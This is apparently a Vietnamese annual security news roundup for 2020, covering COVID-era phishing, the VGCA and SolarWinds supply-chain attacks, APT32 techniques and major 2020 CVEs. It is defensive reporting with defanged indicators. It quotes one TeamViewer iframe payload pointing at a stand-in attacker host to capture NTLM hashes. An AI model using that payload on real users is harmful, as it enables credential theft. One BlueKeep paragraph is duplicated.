Tổng hợp tin tức bảo mật 2020

Phan Văn Hảo – P. DV Giám sát ATTT, HSE


Phần I. Bản tin nổi bật

2020 – Một năm đầy biến động trong lĩnh vực Cyber Security

Thực ra trong ngành ATTT thì năm nào cũng là năm đầy biến động, các cuộc tấn công diễn ra dữ dội với đầy đủ loại, quy mô, các mã độc được phát tán với các kỹ thuật tinh vi, những vụ lừa đảo trực tuyến tăng vọt tuyến tính với sự phát triển của công nghệ thông tin.

Tuy nhiên 2020 lại là một năm đặc biệt nhất. Ngoài những vụ tấn công lừa đảo hay phát tán mã độc lợi dụng sự hoang mang của người dân trong đại dịch Covid thì có thể kể đến sự xuất hiện của các cuộc tấn công vào chuỗi cung ứng (Supply Chain) gây ra hậu quả nặng nề và dai dẳng. Mục tiêu bị tấn công lại là những công ty lớn có sức ảnh hưởng như Solarwinds, hoặc tiêu biểu ở Việt Nam thì có VGCA.

Thông qua việc thu thập, tổng hợp các tin tức an toàn thông tin trên toàn thế giới, nhóm thu thập HPT-Secnews đưa ra các tin tức nổi bật như sau:

1.     Diễn biến COVID phức tạp, hàng loạt các tin tặc lợi dụng dịch bệnh để phát tán mã độc

Từ tháng 2 năm 2020, khi thế giới đang phải vật lộn với chủng loại virus mới sars-cov2 (Covid-19) cùng sự lây lan chóng mặt, không kiểm soát trên cá thể người thì các tin tặc liên tục lợi dụng sự hoang mang của dân số mà liên tục đưa ra các tin giả mạo phishing nhằm lây lan mã độc và trục lợi riêng. Ngoài ra các chiến dịch APT cũng lợi dụng dịch covid mà phát động âm thầm gây nhiều mối nguy hại đến hệ thống mạng doanh nghiệp, quốc gia.

Coronavirus cyber-attacks expose 'cyber poverty gap' – World Economic Forum | The Daily Swig

Work from home (WFH) – các ứng dụng hội họp và học trực tuyến gia tăng kéo theo sự “gia tăng” về số lượng các lỗ hổng bảo mật

Trong bối cảnh dịch covid-19 diễn ra phức tạp, chính phủ nhiều nước đã nỗ lực đưa ra những biện pháp cứng rắn nhằm co cụm, cách ly mầm bệnh khỏi xã hội. Theo tinh thần đó các tổ chức, doanh nghiệp cũng hưởng ứng, thực hiện đúng các chỉ thị do Nhà nước đề ra tạo điều kiện tốt nhất cho người lao động được làm việc ở nhà, đảm bảo an toàn của họ trước sự lây lan của dịch bệnh. Cũng theo đó các nền tảng hỗ trợ việc học trực tuyến và hội họp trực tuyến (meeting online) phát triển mạnh mẽ nhằm đáp ứng các nhu cầu cho hoạt động học tập, hội họp. Đây là tín hiệu đáng mừng khi xã hội đã kịp thay đổi, thích nghi với những khó khăn khi phải đối mặt với một dịch bệnh mới và nguy hiểm. Nhưng kéo theo đó là sự xuất hiện của các lỗ hổng bảo mật nghiêm trọng trên các ứng dụng này mà gần đây nhất và được nhắc đến nhiều nhất là ứng dụng Zoom.

Lừa đảo trực tuyến, lây nhiễm phần mềm độc hại trên mạng xã hội

Với sự phát triển phổ biến của mạng xã hội đặc biệt là những trang mạng xã hội có đông người sử dụng như Facebook, nhiều đối tượng xấu đang sử dụng mạng xã hội làm nền tảng để lừa đảo trực tuyến tống tiền hay phát tán những phần mềm độc hại, gây ra những rủi ro mất an toàn thông tin cho người sử dụng. Lượng người dùng mạng xã hội và Internet không ngừng gia tăng tại Việt Nam như hiện nay thì các nguy cơ mất an toàn thông tin từ mạng xã hội sẽ vẫn tiếp tục là một miếng mồi ngon cho các tin tặc, đặc biệt là trong mùa dịch covid.

Sự gia tăng của các cuộc tấn công có chủ đích (APT)

Năm 2020 xu hướng tấn công có chủ đích (APT) đang diễn biến hết sức phức tạp trên diện rộng. Đây là hình thức tấn công tinh vi và rất khó phát hiện do kẻ tấn công sử dụng các kỹ thuật mới để ẩn nấp và những cuộc tấn công này nhằm vào những người dùng hay các hệ thống quan trọng và có thể xem là mối rủi ro nguy hiểm thường trực hiện nay trên Internet không chỉ ở Việt Nam mà còn trên phạm vi toàn thế giới. Không nằm ngoài dự đoán, tại thời điểm thế giới đang phải đối phó với dịch bệnh covid, nhiều chiến dịch APT được diễn ra, tận dụng các lỗ hổng bảo mật để lây nhiễm các phần mềm độc hại nhằm đánh cắp thông tin, phá hoại hệ thống trên nhiều quốc gia.

Ảnh hưởng lâu dài của COVID-19 – sự chuyển biến của ngành An ninh mạng

Dịch bệnh covid ập đến mang theo sự thay đổi mà chúng ta đã và đang trải qua mang đến nhiều thách thức và khó khăn cho doanh nghiệp: ngoài việc ngăn chặn dịch bệnh lây lan trong khuôn viên doanh nghiệp và giữ vững kinh tế thì việc quan trọng thứ 2 là chống lại các cuốc tấn công an ninh mạng có liên quan đến dịch bệnh nguy hiểm này. Các chuyên gia đã viết rất nhiều trong suốt năm qua về covid-19 và tác động của nó đối với an ninh mạng. Từ việc đảm bảo các nhân viên có thể làm việc tại nhà một cách an toàn đến bảo vệ tính mạng được thúc đẩy bởi địa chính trị, sự xuất hiện của covid-19 đã làm thay đổi nhận thức của mọi người về ngành an ninh mạng. Sự lây lan của dịch covid thật kinh khủng, nhưng sự phát tán của các cuộc tấn công mạng có liên quan đến covid còn nhiều thứ để nói hơn – đó là vấn đề đang ở hiện diện trước chúng ta ngay lúc này. Dịch bệnh đã dần được kiểm soát nhưng những gì chúng ta nên nghĩ là về quan điểm cho dài hạn?

Đã đến lúc suy nghĩ về những gì có thể xảy ra như là xu hướng tấn công dựa vào covid-19 trong những năm tới.

Và điều này sẽ lặp lại! Chúng tôi tin rằng câu trả lời là “có” và theo những hình thức mà chúng ta không đoán trước được.

Vì vậy phải linh hoạt, nghiêm túc với việc giữ vững an ninh thông tin tổ chức, doanh nghiệp.

2.     Số lượng thiết bị IoT bị lây nhiễm mã độc tăng 100% trong một năm qua!

Năm 2020, các thiết bị IoT bị nhiễm mã độc hiện chiếm gần một phần ba (32,7%) trong tổng số thiết bị lây nhiễm, tăng từ 16,2% trong báo cáo năm 2019. Với sự ra đời của 5G, ngoài các lợi ích nó mạng lại, các nhà cung cấp giải pháp IoT tiên tiến cảnh báo về những thách thức bảo mật mới đối với các tổ chức, người dùng 5G.

Đối với các thiệt bị IoT được gán địa chỉ IP internet công khai, tỷ lệ bị nhiễm mã độc khá cao. Trong khi các IoT network sử dụng NAT hay mạng cục bộ, tỷ lệ bị nhiễm mã độc giảm đáng kể, vì các thiết bị chứa lỗ hổng bảo mật không thể nhìn thấy khi dò quét trên mạng internet, một phần thiết bị cũng được bảo vệ và đứng sau lớp phòng thủ của các giải pháp an toàn.

Do đó bảo mật IoT phải được đưa vào và chú trọng ngay từ đầu, bao gồm tất cả các thành phần của hệ sinh thái này nhưng được quản lý từ điểm kiểm soát trung tâm. Việc điều phối và quản lý tự động cũng như các biện pháp kiểm soát bảo mật dự đoán cũng sẽ là chìa khóa quan trọng.

3. Việt Nam: Tấn công nhắm vào chuỗi cung ứng chứng chỉ số (Cục Chứng thực số và Bảo mật thông tin)

Trong tháng 12, một mã độc tấn công mạng mới được phát hiện đã chèn vào chuỗi cung ứng chứng chỉ số thuộc Ban Cơ yếu Chính phủ Việt Nam (VGCA).

Nhóm tin tặc được nghi ngờ là đến từ Trung Quốc, tấn công vào chuỗi cung ứng chứng chỉ số (Cục Chứng thực số và Bảo mật thông tin) và đã lây nhiễm mã độc vào bản cài đặt phần mềm ký số chính thức của VGCA có thể tải về từ trang chủ ca.gov.vn ít nhất từ ngày 23 tháng 7 đến ngày 16 tháng 8 năm 2020. Mã độc có thể phát tán dễ dàng bằng cách ít ai đề phòng, khi người sử dụng chứng chỉ số của cơ quan này tải các gói cài đặt ký số của VGCA về tại đường link chính thức: https://ca[.]gov[.]vn/tai-phan-mem

Trong số các trình cài đặt có sẵn để tải xuống, có 2 file là gca01-client-v2-x32-8.3.msi và gca01-client-v2-x64-8.3.msi, đã được sửa đổi để đính kèm thêm một phần mềm độc hại được gọi là PhantomNet hoặc SManager được các chuyên gia an ninh mạng phân tích gần đây.

Các gói cài đặt đó được tải xuống từ ca.gov.vn qua giao thức HTTPS, vì vậy đây không phải là một cuộc tấn công Man In The Middle. Các URL trỏ đến trình cài đặt độc hại cụ thể là:

• https://ca.gov[.]vn/documents/20182/6768590/gca01-client-v2-x32-8.3.msi

• https://ca.gov[.]vn/documents/20182/6768590/gca01-client-v2-x64-8.3.msi

Sau khi được cài đặt, phần mềm đã sửa đổi sẽ khởi động chương trình GCA chính hãng và ngủ đông để che dấu hành vi đáng ngờ và sau đó chạy backdoor PhantomNet giả mạo dưới dạng một tệp dường như vô hại có tên “eToken.exe”. Backdoor này được biên dịch gần đây nhất vào ngày 26 tháng 4 – chịu trách nhiệm thu thập thông tin hệ thống, với các khả năng tải thêm các mã độc hại khác bổ sung thông qua các plugin được truy xuất từ máy chủ C&C và các lệnh được mã hóa để khó bị nhận ra (Các C&C điển hình là: “vgca.homeunix[.]Org” và “office365.blogdns[.]com”) bắt chước tên của VGCA và phần mềm office của Microsoft để khỏi bị nghi ngờ.

Có thể thấy đây là một cuốc tấn công có mức độ nguy hại nghiêm trọng, có khả năng lây nhiễm diện rộng, ảnh hưởng trực tiếp đến an ninh thông tin quốc gia.

4. Sự kiện Solarwinds bị tấn công mạng, chấn động nền an toàn thông tin toàn cầu

Vào 13/12/2020 Cơ quan An Ninh Hạ Tầng và An Ninh Mạng (CISA) và Trung Tâm Ứng Cứu Khẩn Cấp (CERT) đã thông báo khẩn cấp về việc tin tặc đã tấn công vào hệ thống của SolarWinds và chèn mã độc cửa hậu vào các phần mềm xây dựng trên nền tảng Orion Platform của hãng bao gồm các phiên bản 2019.4 HF 5, 2020.2, và 2020.2 HF 1.

Lỗ hổng này giúp tin tặc xâm chiếm các máy chủ đang chạy những sản phẩm Orion của SolarWinds. Danh sách các sản phẩm ảnh hưởng bao gồm:

  • Application Centric Monitor (ACM)
  • Database Performance Analyzer
  • Enterprise Operations Console (EOC)
  • High Availability (HA)
  • IP Address Manager (IPAM)
  • Log Analyzer (LA)
  • Network Automation Manager (NAM)
  • Network Configuration Manager (NCM)
  • Network Operations Manager (NOM)
  • User Device Tracker (UDT)

Thành phần mã độc cửa hậu đã bị tin tặc chèn vào đường dẫn cập nhật của SolarWinds tại hxxps://downloads.solarwinds[.]com/solarwinds/CatalogResources/Core/2019.4/2019.4.5220.20574/SolarWinds-Core-v2019.4.5220-Hotfix5.msp. Trong bản cập nhật này có thành phần SolarWinds.Orion.Core.BusinessLayer.dll chứa mã độc cửa hậu có giao tiếp HTTP với máy chủ của tin tặc. Do đó, tất cả các phần mềm Orion tải bản cập nhật này đều bị nhiễm mã độc cửa hậu giao tiếp HTTP với máy chủ của tin tặc. Nạn nhân của cuộc tấn công này bao gồm nhiều tổ chức chính phủ, tư vấn, công nghệ, viễn thông trên toàn thế giới. Sau khi lây nhiễm, mã độc tạm thời “ngủ đông” trong thời gian lên đến 2 tuần. Sau thời gian này, mã độc sẽ thực thi các lệnh để truyền file, thực thi file, rà quét, reboot máy chủ và tắt các dịch vụ của hệ thống. Mã độc lợi dụng giao thức, hoạt động của phần mềm SolarWinds để tránh sự phát hiện của các biện pháp bảo mật. Solarwinds là một nền tảng giám sát mạng được nhiều tổ chức, tập đoàn lớn và cơ quan Chính phủ trong đó có Mỹ sử dụng. Vì vậy đây là một cuộc tấn công mang quy mô toàn cầu, ảnh hưởng trực tiếp bảo mật và an ninh thông tin của các công ty vĩ mô và chính phủ các quốc gia. Theo đó hậu quả mà nó để lại khó có thể đo lường hết được.

5. Lỗ Hổng Bluekeep

Lỗ Hổng Bluekeep tuy là lỗ hổng được định thời gian vào 2019 nhưng vẫn nổi trội và thực sự nguy hiểm trong năm 2020. BlueKeep là một lỗ hổng thực thi mã từ xa trong Dịch vụ kết nối Máy tính từ xa của Windows (Windows Remote Desktop Services). Lỗ hổng BlueKeep có định danh CVE-2019-0708, được đánh giá mức độ nghiêm trọng. Vào ngày 14/05/2019 Microsoft đã phát hành bản cập nhật cho lỗ hổng có mã CVE-2019-0708 tồn tại trong dịch vụ Remote Desktop. Đáng lo ngại, tin tặc có thể sử dụng lỗ hổng như một phương thức để phát tán mã độc đào tiền ảo, trojan ngân hàng hoặc các loại mã độc khác, dù không cần sự tương tác của người dùng. Nó cho phép kẻ tấn công sử dụng Remote Desktop Services của Microsoft để tấn công các máy tính chưa được vá đang chạy các phiên bản cũ của Windows, Windows XP, Windows 7, Windows Server 2003 và Windows Server 2008.

BlueKeep là một lỗ hổng thực thi mã từ xa trong Dịch vụ kết nối Máy tính từ xa của Windows (Windows Remote Desktop Services). Lỗ hổng BlueKeep có định danh CVE-2019-0708, được đánh giá mức độ nghiêm trọng. Vào ngày 14/05/2019 Microsoft đã phát hành bản cập nhật cho lỗ hổng có mã CVE-2019-0708 tồn tại trong dịch vụ Remote Desktop. Đáng lo ngại, tin tặc có thể sử dụng lỗ hổng như một phương thức để phát tán mã độc đào tiền ảo, trojan ngân hàng hoặc các loại mã độc khác, mà không cần sự tương tác của người dùng. Nó cho phép kẻ tấn công sử dụng Remote Desktop Services của Microsoft để tấn công các máy tính chưa được vá đang chạy các phiên bản cũ của Windows, Windows XP, Windows 7, Windows Server 2003 và Windows Server 2008.

6. Oceanlotus APT32 năm 2020 tiếp tục hoạt động mạnh mẽ

OceanLoutus (“Hoa sen biển đông”), hay còn có mật danh APT32, là một nhóm tin tặc nổi tiếng, chuyên thực hiện các phi vụ tấn công có chủ đích – APT vào các cơ quan tổ chức, đặc biệt nhắm vào các cơ quan chính phủ và tổ chức tư nhân nước ngoài. Nhìn chung, không cần phải giới thiệu nhiều về độ nổi tiếng về hoạt động tấn công oanh tạc của nhóm này vào các tổ chức công bố, hoặc một số khác không công bố. OceanLoutus đã thực hiện rất nhiều phi vụ động trời và tốn nhiều giấy mực của báo chí, cũng như sự khiếp đảm của dân trong nghề. OceanLotus đã bắt đầu đi vào hoạt động từ rất lâu, dân trong nghề biết đến OceanLotus vào những năm 2014, cũng có một số nguồn tin ghi nhận vào năm 2012. Một số nguồn tin không chính thống cáo buộc sự hậu thuẫn của Việt Nam đằng sau tồ chức này, nhưng chưa có bằng chứng cụ thể. Một phần hoạt động tổ chức tấn công của nhóm tin tặc này được tổ chức một cách rất bài bản, phần còn lại là các kỹ thuật tinh vi, xóa chứng cứ sau mỗi phi vụ trót lọt.

Hoạt động của OceanLotus từ lâu là thế nhưng chưa ai đủ tự tin để đảm bảo rằng chính tổ chức của mình có đang là mục tiêu của OceanLotus hay không, thực tế OceanLotus đã làm gì để chiếm được hệ thống trót lọt. Cho đến gần đây, nhờ sự phát triển của các công nghệ giám sát và đội ngũ giám sát HSOC, một phần sự thật chuỗi tấn công “chết chóc” của nhóm này đã được phơi bày. Theo báo cáo quý vừa qua về tình hình giám sát ATTT của Trung tâm Giám sát ATTT cho thấy hoạt động ngầm của OceanLotus luôn diễn ra mạnh mẽ và được chỉ huy bài bản. Điều này minh chứng qua các lần đối đầu của đội giám sát, điều tra, ứng cứu HSOC và OceanLotus ngày càng trở nên thường xuyên hơn. Không giống như các sự vụ bảo mật thông thường đã xử lý trước đó, việc đối mặt này buộc đội HSOC phải cử nhiều chuyên gia điều tra bảo mật phân tích sâu vào các hành vi của OceanLotus để từ đó đưa ra các các biện pháp ngăn chặn các rủi ro.

Báo cáo giám sát ATTT cũng cho thấy rằng kỹ thuật mà OceanLotus sử dụng có nhiều sự cải tiến và tinh vi qua các lần đối mặt. Trong đó nổi bật nhất có các kỹ thuật sau:

  • Phishing email, bao gồm tệp tin có đính kèm mã độc, backdoor có khả năng vượt qua được sự phát hiện của các phần mềm diệt Virus thông thường.
  • Khai thác lỗ hổng bảo mật, bao gồm các lỗ hổng bảo mật đã biết và chưa biết (0-day). Trong lần đối mặt gần nhất, Trung tâm giám sát HSOC đã phát hiện nhóm này cố tình dùng kỹ thuật dll hijacking để khai thác lỗ hổng trên phần mềm Microsoft Word và Google Chrome, làm bàn đạp leo thang đặc quyền.
  • Kỹ thuật dịch chuyển lây lan trong hệ thống nhờ sử dụng các công cụ trích xuất thông tin đăng nhập, bao gồm trích xuất password, hash, sau đó lợi dụng thông tin này để tiếp tục kỹ thuật pass the hash, pass the ticket.
  • Cài cắm backdoor và kênh truyền bí mật (tunneling) nhằm tuồng một lượng lớn dữ liệu ra bên ngoài.
  • Xóa các chứng cứ, dấu vết.

Bởi sự tinh vi và bài bản của các sự vụ OceanLotus đã thực hiện, Trung tâm giám sát ATTT HSOC đề nghị các tổ chức tăng cường giám sát các hệ thống trọng điểm.

Phần II. Tổng hợp thông tin lỗ hổng bảo mật

Năm 2020 cũng giống như những năm trước, đã có rất nhièu lỗ hổng bảo mật nghiêm trọng được phát hiện ra, trong đó có thể kể đến như:

1. Lỗ hổng nghiêm trọng Zerologon trong cơ chế Windows NetLogon khiến hacker có thể chiếm quyền cao nhất trong domain (Domain Administrator) – CVE-2020-1472

Lỗ hổng bảo mật, được đặt tên là “Zerologon”, là một lỗ hổng leo thang đặc quyền (CVE-2020-1472) với điểm CVSS là 10 trên 10 khiến nó được đánh giá là lỗ hổng cực kì nghiêm trọng. Lỗ hổng đã được giải quyết trong bản cập nhật bảo mật tháng 8 năm 2020 của Microsoft. Tuy nhiên, trong tuần này, ít nhất bốn lần khai thác PoC công khai cho lỗ hổng đã được phát hành trên Github và vào thứ Sáu, các nhà nghiên cứu của Secura (người đã phát hiện ra lỗ hổng) đã công bố chi tiết kỹ thuật của lỗ hổng.

Việc tồn tại lỗ hổng CVE-2020-1472 trong hệ thống cho phép kẻ tấn công có thể đánh cắp tài khoản của user bất kỳ trong Domain, và tệ hơn hết ngay cả tài khoản Domain Controller cũng có thể bị đánh cắp. Hacker có thể toàn quyền cài đặt, cài cắm các phần mềm độc hại lên các máy chủ, máy tính người dùng mà không cần được cho phép. Các bản cập nhật đã được phát hành theo hai giai đoạn: giai đoạn Intial cho các bản cập nhật được phát hành vào sau ngày 11 tháng 8 năm 2020, và giai đoạn Enforcement đối với các bản cập nhật được phát hành vào sau ngày 9 tháng 2 năm 2021.

2. Các lỗ hổng nghiêm trọng từ các thiết bị của Cisco

Cập nhật tháng 10 năm 2020, nhiều lỗ hổng nghiêm trọng với CVSS cao >8.5 tồn tại trong các thiết bị của hãng Cisco bao gồm:

  • CVE-2020-27124 – Cisco Adaptive Security Appliance Software SSL/TLS Denial of Service Vulnerability
  • CVE-2020-3572 – Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software SSL/TLS Session Denial of Service Vulnerability
  • CVE-2020-3554 – Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Denial of Service Vulnerability
  • CVE-2020-3529 – Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software SSL VPN Direct Memory Access Denial of Service Vulnerability

Cisco cảnh báo về lỗ hổng nghiêm trọng cao trong việc triển khai giao thức Cisco Discovery cho phần mềm Cisco IOS XR cho phép kẻ tấn công thực thi mã tùy ý trên thiết bị bị ảnh hưởng. Lỗ hổng bảo mật là do xác thực không đúng cách đối với chuỗi đầu vào từ các trường nhất định trong message của giao thức Cisco Discovery. Kẻ tấn công có thể khai thác lỗ hổng này bằng cách gửi một gói Cisco Discovery độc hại đến một thiết bị bị ảnh hưởng. Việc khai thác thành công lỗ hổng cho phép kẻ tấn công gây ra tràn ngăn xếp, điều này có thể cho phép kẻ tấn công thực thi mã tùy ý với các đặc quyền quản trị trên thiết bị bị ảnh hưởng.

Lỗ hổng bảo mật ảnh hưởng đến tất cả các sản phẩm bộ định tuyến của Cisco và bên thứ ba khác có bật giao thức Cisco Discovery trên toàn cầu, danh sách ban đầu bao gồm:

  • ASR 9000 Series Aggregation Services Routers
  • Carrier Routing System (CRS)
  • IOS XRv 9000 Router
  • Network Convergence System (NCS) 540 Series Routers
  • Network Convergence System (NCS) 560 Series Routers
  • Network Convergence System (NCS) 1000 Series Routers
  • Network Convergence System (NCS) 5000 Series Routers
  • Network Convergence System (NCS) 5500 Series Routers
  • Network Convergence System (NCS) 6000 Series Routers

Cisco đã xác nhận rằng lỗ hổng này không ảnh hưởng đến Cisco Network Convergence System (NCS) 520 Series Routers. Không có giải pháp thay thế nào khả dụng, nếu bạn không sử dụng tính năng Giao thức Khám phá của Cisco thì bạn có thể tắt tính năng này.

Cisco đã phát hành các bản cập nhật phần mềm miễn phí giải quyết lỗ hổng được mô tả ở phần trên, người dùng nên cập nhật phiên bản mới để vá lỗi.

Lỗ hổng CVE-2020-3452 trong Cisco ASA & FTD

Lỗ hổng bảo mật qua đường dẫn có mức độ nghiêm trọng cao CVE-2020-3452 qua Cisco Adaptive Security Appliance (ASA) và Cisco FirePower Threat Defense (FTD).

Lỗ hổng cho phép kẻ tấn công từ xa thực hiện một cuộc tấn công truyền qua thư mục cho phép kẻ tấn công đọc các tệp nhạy cảm trên một hệ thống mục tiêu. Lỗ hổng này tồn tại là do thiếu xác thực đầu vào của các URL trong các yêu cầu HTTP, kẻ tấn công có thể khai thác lỗ hổng này bằng cách gửi một yêu cầu HTTP được tạo thủ công có chứa các chuỗi ký tự truyền tải thư mục.

Rapid7 Labs cho biết rằng “chỉ có khoảng 10% thiết bị Cisco ASA / FTD được khởi động lại kể từ khi phát hành bản vá. Điều đó nói lên rằng chỉ 27 trong số 398 công ty được phát hiện đã được vá / khởi động lại. Hãy kiểm tra hệ thống Cisco ASA / FTD trong doanh nghiệp của bạn đã được vá lỗ hổng này chưa.

3. Lỗ hổng bảo mật CVE-2019-18822 trên ứng dụng Zoom 6.3.1

Lỗ hổng leo thang đặc quyền trong phần mềm ZOOM Call Recording 6.3.1 cho phép tài khoản người dùng (ví dụ: tài khoản mà chương trình chạy – theo mặc định là “callrec”) leo thang đặc quyền lên root bằng cách dùng callrec-rs @ .service. The [email protected] chạy file binary /opt/callrec/bin/rs với quyền root và file binary này được sở hữu bởi callrec. Nó có thể được thay thế hợp pháp bằng một con Trojan horse, lúc đó con trojan này cũng sẽ có quyền root – quyền cao nhất có thể thực hiện thay đổi bất kỳ trong hệ thống.

4. Lỗ hổng TeamViewer CVE-2020-13699 bị khai thác thành công: bẻ khóa mật khẩu của người dùng

Một lỗ hổng có mức độ cao (CVE-2020-13699) trong TeamViewer dành cho Windows có thể bị kẻ tấn công từ xa khai thác để bẻ khóa mật khẩu của người dùng và do đó dẫn đến việc khai thác hệ thống. Tất nhiên sau đó kẻ tấn công có thể cài cắm bất cứ thứ gì lên máy tính nạn nhân.

Teamview là một phần mềm điều khiển máy tính từ xa được sử dụng phổ biến trên toàn thế giới. Lỗ hổng CVE-2020-13699 là điểm yếu bảo mật phát sinh từ phần tử hoặc đường dẫn tìm kiếm không được trích dẫn. Cụ thể hơn, đó là do ứng dụng không trích dẫn chính xác các trình xử lý URI tùy chỉnh của nó – và có thể bị khai thác khi hệ thống có cài đặt phiên bản TeamViewer dễ bị tấn công trang web thủ công độc hại.

“Kẻ tấn công có thể nhúng iframe độc hại vào một trang web có URL được tạo thủ công (iframe src = ‘teamviewer10: –play \\ attacker-IP \ share \ fake.tvs’) sẽ khởi chạy ứng dụng khách TeamViewer Windows trên máy tính để bàn và buộc nó phải mở một chia sẻ SMB từ xa” theo Jeffrey Hofmann, một kỹ sư bảo mật của Praetorian, người đã phát hiện và tiết lộ lỗ hổng.

“Windows sẽ thực hiện xác thực NTLM khi mở chia sẻ SMB và yêu cầu đó có thể được chuyển tiếp (sử dụng một công cụ như trình phản hồi) để thực thi mã (hoặc bắt để bẻ khóa hàm băm).”

Như đã nói trước đây, việc khai thác lỗ hổng có thể được bắt đầu từ xa và không cần xác thực trước đó. Lỗ hổng có vẻ lý tưởng cho các cuộc tấn công flooding có chủ đích. Không có dấu hiệu nào cho thấy lỗ hổng này đang bị khai thác trong không gian mạng và hiện không có hoạt động khai thác công khai nào. CIS đánh giá rằng lỗ hổng này sẽ được sử dụng trong các cuộc tấn công có chủ đích (APT) vào các tổ chức chính phủ và doanh nghiệp lớn và vừa, trung bình đối với các tổ chức chính phủ và doanh nghiệp nhỏ và thấp đối với người dùng gia đình. Theo công ty, lỗ hổng này ảnh hưởng đến TeamViewer phiên bản 8 đến 15 (lên đến 15.8.2) cho nền tảng Windows. Người dùng nên nâng cấp lên phiên bản 15.8.3 để đóng lỗ hổng.

5. Lỗ hổng nghiêm trọng trên Windows DNS khiến hacker có thể chiếm quyền cao nhất trong domain (Domain Administrator)

DNS, thường được mô tả là danh bạ điện thoại của Internet, là một giao thức mạng để dịch tên máy tính thân thiện với con người thành địa chỉ IP. Bởi vì nó là một thành phần cốt lõi của Internet, có rất nhiều giải pháp và triển khai máy chủ DNS, nhưng chỉ có một số ít được sử dụng rộng rãi.

Windows Windows DNS Server Server là một triển khai của Microsoft và là một phần thiết yếu và là một yêu cầu phải có đối với môi trường Windows Domain.

SIGRed (CVE-2020-1350) là một lỗ hổng ở mức độ nghiêm trọng, có thể bị khai thác (điểm CVSS là 10.0) trong máy chủ DNS Windows ảnh hưởng đến Windows Server phiên bản 2003 đến 2019 và có thể được kích hoạt thông qua response DNS độc hại. Vì dịch vụ đang chạy trong các đặc quyền cao nhất (SYSTEM), nếu được khai thác thành công, kẻ tấn công được cấp quyền Quản trị viên tên miền (Domain Admin) và có quyền truy cập toàn bộ cơ sở hạ tầng của công ty.

6. Lỗ hổng RCE trong Microsoft TCP/IP Stack: ICMPv6 – CVE-2020-16898

Một lỗ hổng thực thi mã từ xa tồn tại khi ngăn xếp TCP / IP Windows xử lý không đúng cách các gói ICMPv6 Router Advertisement. Kẻ tấn công khai thác thành công lỗ hổng này có thể có được khả năng thực thi mã trên máy chủ hoặc máy khách mục tiêu. Để khai thác lỗ hổng này, kẻ tấn công sẽ phải gửi các gói Quảng cáo Bộ định tuyến ICMPv6 được chế tạo đặc biệt tới một máy tính Windows từ xa. Lỗ hổng CVE-2020-16898 được Microsoft tiết lộ trong một tư vấn bảo mật vào ngày 13 tháng 10 năm 2020. Đây là lỗ hổng thực thi mã từ xa (RCE) trong triển khai Windows TCP / IP của Microsoft. Microsoft viết về nó trong cố vấn bảo mật, hiện lỗ hổng đã được vá bởi bản cập nhật mới của Windows.